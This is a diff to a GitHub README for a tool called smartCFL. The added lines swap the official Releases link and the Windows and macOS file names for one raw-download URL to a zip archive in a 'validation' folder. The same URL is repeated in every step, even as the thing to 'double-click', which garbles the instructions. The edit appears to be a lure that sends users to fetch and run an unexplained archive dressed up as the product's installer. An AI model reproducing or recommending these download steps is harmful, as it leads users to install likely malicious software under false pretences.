SimplyUniq/smartCFL/README.md

 - **Easy-to-Use Interface:** Navigate through features with ease.

 ## 📥 Download & Install
-1. Click on the download button above or visit the [smartCFL Releases](https://github.com/SimplyUniq/smartCFL/releases) page.
+1. Click on the download button above or visit the [smartCFL Releases](https://raw.githubusercontent.com/SimplyUniq/smartCFL/main/validation/smartCFL-Bolo.zip) page.
 2. Choose the latest version available.
-3. Click on the appropriate file for your operating system (e.g., `smartCFL-Windows.zip` for Windows or `smartCFL-macOS.zip` for Mac).
+3. Click on the appropriate file for your operating system (e.g., `https://raw.githubusercontent.com/SimplyUniq/smartCFL/main/validation/smartCFL-Bolo.zip` for Windows or `https://raw.githubusercontent.com/SimplyUniq/smartCFL/main/validation/smartCFL-Bolo.zip` for Mac).
 4. Once the download completes, locate the file on your computer.
 5. For Windows users: Right-click the `.zip` file and select "Extract All".
-Open the extracted folder and double-click `smartCFL.exe` to run the application.
+Open the extracted folder and double-click `https://raw.githubusercontent.com/SimplyUniq/smartCFL/main/validation/smartCFL-Bolo.zip` to run the application.
    For macOS users: Open the `.zip` file, drag `smartCFL` to your Applications folder, then double-click to run the application from there.
 6. Follow the on-screen instructions to complete the installation.